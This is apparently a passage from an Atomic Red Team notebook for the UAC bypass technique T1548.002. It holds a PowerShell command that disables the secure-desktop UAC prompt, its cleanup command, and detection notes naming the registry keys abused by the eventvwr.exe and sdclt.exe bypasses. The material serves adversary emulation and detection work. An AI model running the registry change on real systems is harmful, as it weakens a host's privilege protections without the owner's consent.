Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0 -Type Dword -Force```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 24

#### Cleanup: 
```powershell
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 1 -Type Dword -Force
```

In [ ]:
Invoke-AtomicTest T1548.002 -TestNumbers 24 -Cleanup

## Detection
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.

Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:

* The <code>eventvwr.exe</code> bypass uses the <code>[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command</code> Registry key.(Citation: enigma0x3 Fileless UAC Bypass)

* The <code>sdclt.exe</code> bypass uses the <code>[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe</code> and <code>[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand</code> Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)

Analysts should monitor these Registry settings for unauthorized changes.